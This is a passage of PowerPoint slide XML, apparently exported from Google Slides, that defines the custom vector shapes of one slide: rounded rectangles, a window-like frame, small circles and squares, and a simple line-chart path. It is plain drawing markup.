            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5722981" y="1578709"/>
              <a:ext cx="2787680" cy="1910961"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141381" h="96917" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="4565" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2054" y="0"/>
                    <a:pt x="0" y="2032"/>
                    <a:pt x="0" y="4565"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="92351"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="94862"/>
                    <a:pt x="2054" y="96916"/>
                    <a:pt x="4565" y="96916"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136815" y="96916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139326" y="96916"/>
                    <a:pt x="141380" y="94862"/>
                    <a:pt x="141380" y="92351"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141380" y="4565"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141380" y="2032"/>
                    <a:pt x="139326" y="0"/>
                    <a:pt x="136815"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 name="Google Shape;1302;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DC126D0-D877-7CD4-2EB5-7CA834E70725}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5717579" y="1572852"/>
              <a:ext cx="2798919" cy="1922220"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141951" h="97488" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="137089" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139440" y="571"/>
                    <a:pt x="141380" y="2489"/>
                    <a:pt x="141380" y="4862"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141380" y="92648"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141380" y="94999"/>
                    <a:pt x="139440" y="96917"/>
                    <a:pt x="137089" y="96917"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4839" y="96917"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2488" y="96917"/>
                    <a:pt x="571" y="94999"/>
                    <a:pt x="571" y="92648"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="571" y="4862"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="2489"/>
                    <a:pt x="2488" y="571"/>
                    <a:pt x="4839" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4839" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2169" y="1"/>
                    <a:pt x="0" y="2192"/>
                    <a:pt x="0" y="4862"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="92648"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="95319"/>
                    <a:pt x="2169" y="97487"/>
                    <a:pt x="4839" y="97487"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="137089" y="97487"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139760" y="97487"/>
                    <a:pt x="141951" y="95319"/>
                    <a:pt x="141951" y="92648"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141951" y="4862"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141951" y="2192"/>
                    <a:pt x="139760" y="1"/>
                    <a:pt x="137089"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 name="Google Shape;1303;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B32B2AD-49D6-E1C6-6DDB-BA9A6F64C6F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5664460" y="1578709"/>
              <a:ext cx="2787680" cy="1910961"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141381" h="96917" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="4566" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="0"/>
                    <a:pt x="1" y="2032"/>
                    <a:pt x="1" y="4565"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="92351"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="94862"/>
                    <a:pt x="2055" y="96916"/>
                    <a:pt x="4566" y="96916"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136816" y="96916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139327" y="96916"/>
                    <a:pt x="141381" y="94862"/>
                    <a:pt x="141381" y="92351"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141381" y="4565"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141381" y="2032"/>
                    <a:pt x="139327" y="0"/>
                    <a:pt x="136816" y="0"/>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 name="Google Shape;1304;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D926555E-A70C-F069-B73A-EC97BCD77706}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5659077" y="1572852"/>
              <a:ext cx="2798465" cy="1922220"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141928" h="97488" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="137089" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139440" y="571"/>
                    <a:pt x="141357" y="2489"/>
                    <a:pt x="141357" y="4862"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141357" y="92648"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141357" y="94999"/>
                    <a:pt x="139440" y="96917"/>
                    <a:pt x="137089" y="96917"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4839" y="96917"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2488" y="96917"/>
                    <a:pt x="571" y="94999"/>
                    <a:pt x="571" y="92648"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="571" y="4862"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="2489"/>
                    <a:pt x="2488" y="571"/>
                    <a:pt x="4839" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4839" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2168" y="1"/>
                    <a:pt x="0" y="2192"/>
                    <a:pt x="0" y="4862"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="92648"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="95319"/>
                    <a:pt x="2168" y="97487"/>
                    <a:pt x="4839" y="97487"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="137089" y="97487"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139759" y="97487"/>
                    <a:pt x="141928" y="95319"/>
                    <a:pt x="141928" y="92648"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141928" y="4862"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141928" y="2192"/>
                    <a:pt x="139759" y="1"/>
                    <a:pt x="137089"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 name="Google Shape;1305;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8CD64E-3349-76A8-0FFF-2041D33801EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5664460" y="3307834"/>
              <a:ext cx="2787680" cy="181835"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141381" h="9222" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="4656"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="7167"/>
                    <a:pt x="2055" y="9221"/>
                    <a:pt x="4566" y="9221"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136816" y="9221"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139327" y="9221"/>
                    <a:pt x="141381" y="7167"/>
                    <a:pt x="141381" y="4656"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141381" y="0"/>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 name="Google Shape;1306;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6AF2428-C33D-E55A-3E3A-358CB9CAAF17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5659077" y="3301978"/>
              <a:ext cx="2798465" cy="193093"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141928" h="9793" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="141357" y="571"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="141357" y="4953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141357" y="7304"/>
                    <a:pt x="139440" y="9222"/>
                    <a:pt x="137089" y="9222"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4839" y="9222"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2488" y="9222"/>
                    <a:pt x="571" y="7304"/>
                    <a:pt x="571" y="4953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="571" y="571"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="274" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="114" y="0"/>
                    <a:pt x="0" y="137"/>
                    <a:pt x="0" y="297"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="4953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7624"/>
                    <a:pt x="2168" y="9792"/>
                    <a:pt x="4839" y="9792"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="137089" y="9792"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139759" y="9792"/>
                    <a:pt x="141928" y="7624"/>
                    <a:pt x="141928" y="4953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141928" y="297"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141928" y="137"/>
                    <a:pt x="141814" y="0"/>
                    <a:pt x="141654"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 name="Google Shape;1307;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA8817F6-41A4-ECEE-CD62-EE107984E54D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7013749" y="3354190"/>
              <a:ext cx="89123" cy="88670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4520" h="4497" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2260" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1027" y="0"/>
                    <a:pt x="0" y="1004"/>
                    <a:pt x="0" y="2260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3492"/>
                    <a:pt x="1027" y="4497"/>
                    <a:pt x="2260" y="4497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3492" y="4497"/>
                    <a:pt x="4520" y="3492"/>
                    <a:pt x="4520" y="2260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4520" y="1004"/>
                    <a:pt x="3492" y="0"/>
                    <a:pt x="2260" y="0"/>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 name="Google Shape;1308;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A8ECC1-69CE-83C4-90E0-6EBA63B4D0F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7008347" y="3348787"/>
              <a:ext cx="99928" cy="99928"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5068" h="5068" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2534" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3607" y="571"/>
                    <a:pt x="4497" y="1438"/>
                    <a:pt x="4497" y="2534"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4497" y="3607"/>
                    <a:pt x="3607" y="4497"/>
                    <a:pt x="2534" y="4497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1461" y="4497"/>
                    <a:pt x="571" y="3607"/>
                    <a:pt x="571" y="2534"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="1438"/>
                    <a:pt x="1461" y="571"/>
                    <a:pt x="2534" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2534" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1142" y="0"/>
                    <a:pt x="0" y="1119"/>
                    <a:pt x="0" y="2534"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3926"/>
                    <a:pt x="1142" y="5067"/>
                    <a:pt x="2534" y="5067"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3926" y="5067"/>
                    <a:pt x="5068" y="3926"/>
                    <a:pt x="5068" y="2534"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5068" y="1119"/>
                    <a:pt x="3926" y="0"/>
                    <a:pt x="2534"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 name="Google Shape;1309;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{186F562D-7238-B818-0325-D86DB8C144CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5664460" y="1578709"/>
              <a:ext cx="2787680" cy="90030"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141381" h="4566" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="4566" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="0"/>
                    <a:pt x="1" y="2032"/>
                    <a:pt x="1" y="4565"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141381" y="4565"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141381" y="2032"/>
                    <a:pt x="139327" y="0"/>
                    <a:pt x="136816"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7" name="Google Shape;1310;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1945A7FB-155A-BDE3-7F68-AA50BB1BA667}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5659077" y="1572852"/>
              <a:ext cx="2798465" cy="101289"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141928" h="5137" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="137089" y="571"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139349" y="571"/>
                    <a:pt x="141220" y="2352"/>
                    <a:pt x="141357" y="4566"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="571" y="4566"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="708" y="2352"/>
                    <a:pt x="2579" y="571"/>
                    <a:pt x="4839" y="571"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4839" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2168" y="1"/>
                    <a:pt x="0" y="2192"/>
                    <a:pt x="0" y="4862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5022"/>
                    <a:pt x="114" y="5136"/>
                    <a:pt x="274" y="5136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141654" y="5136"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141814" y="5136"/>
                    <a:pt x="141928" y="5022"/>
                    <a:pt x="141928" y="4862"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141928" y="2192"/>
                    <a:pt x="139759" y="1"/>
                    <a:pt x="137089"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8" name="Google Shape;1311;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A6BBD0-7511-3D5F-4FF3-44BE1FED9D69}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5850337" y="1818592"/>
              <a:ext cx="1007702" cy="684552"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="51107" h="34718" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="34717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51107" y="34717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51107" y="0"/>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9" name="Google Shape;1312;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E235DAC8-3A75-9A3B-6F8F-3ADE104C3E82}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5850337" y="2478812"/>
              <a:ext cx="1007702" cy="24331"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="51107" h="1234" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51107" y="1233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51107" y="1"/>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 name="Google Shape;1313;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F1A4885-AC0A-134F-682F-684167EEB982}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892197" y="1860432"/>
              <a:ext cx="57634" cy="57634"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="2923" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2352" y="572"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2352" y="2352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571" y="2352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571" y="572"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="274" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="1"/>
                    <a:pt x="1" y="138"/>
                    <a:pt x="1" y="298"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="2626"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="2786"/>
                    <a:pt x="115" y="2923"/>
                    <a:pt x="274" y="2923"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2625" y="2923"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="2923"/>
                    <a:pt x="2922" y="2786"/>
                    <a:pt x="2922" y="2626"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2922" y="298"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2922" y="138"/>
                    <a:pt x="2785" y="1"/>
                    <a:pt x="2625"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 name="Google Shape;1314;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94578934-6EDF-E21E-98D4-DB81997745BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5984455" y="1906788"/>
              <a:ext cx="57634" cy="11278"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2923" h="572" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="297" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="1"/>
                    <a:pt x="1" y="138"/>
                    <a:pt x="1" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="435"/>
                    <a:pt x="138" y="572"/>
                    <a:pt x="297" y="572"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2648" y="572"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2785" y="572"/>
                    <a:pt x="2922" y="435"/>
                    <a:pt x="2922" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2922" y="138"/>
                    <a:pt x="2785" y="1"/>
                    <a:pt x="2648"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 name="Google Shape;1315;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42EF6D99-6005-280D-68E1-27FFE2E17715}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6015057" y="2040906"/>
              <a:ext cx="697171" cy="274113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="35358" h="13902" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="7191" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7077" y="1"/>
                    <a:pt x="6985" y="69"/>
                    <a:pt x="6940" y="161"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69" y="13491"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="13628"/>
                    <a:pt x="46" y="13787"/>
                    <a:pt x="183" y="13856"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="13879"/>
                    <a:pt x="275" y="13901"/>
                    <a:pt x="320" y="13901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="435" y="13901"/>
                    <a:pt x="526" y="13833"/>
                    <a:pt x="571" y="13742"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7236" y="845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13696" y="10569"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13742" y="10637"/>
                    <a:pt x="13810" y="10683"/>
                    <a:pt x="13901" y="10706"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13993" y="10706"/>
                    <a:pt x="14061" y="10683"/>
                    <a:pt x="14130" y="10615"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21845" y="2854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26729" y="8583"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="26752" y="8606"/>
                    <a:pt x="26798" y="8629"/>
                    <a:pt x="26821" y="8652"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="34901" y="12509"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="34949" y="12530"/>
                    <a:pt x="34997" y="12540"/>
                    <a:pt x="35042" y="12540"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35148" y="12540"/>
                    <a:pt x="35241" y="12484"/>
                    <a:pt x="35289" y="12372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35357" y="12235"/>
                    <a:pt x="35289" y="12075"/>
                    <a:pt x="35152" y="12007"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="27140" y="8150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22073" y="2238"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22027" y="2169"/>
                    <a:pt x="21959" y="2146"/>
                    <a:pt x="21867" y="2146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21855" y="2142"/>
                    <a:pt x="21842" y="2140"/>
                    <a:pt x="21828" y="2140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21767" y="2140"/>
                    <a:pt x="21699" y="2178"/>
                    <a:pt x="21662" y="2215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="13970" y="9976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7442" y="138"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7373" y="47"/>
                    <a:pt x="7282" y="1"/>
                    <a:pt x="7191"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 name="Google Shape;1316;p52">
              <a:extLst>
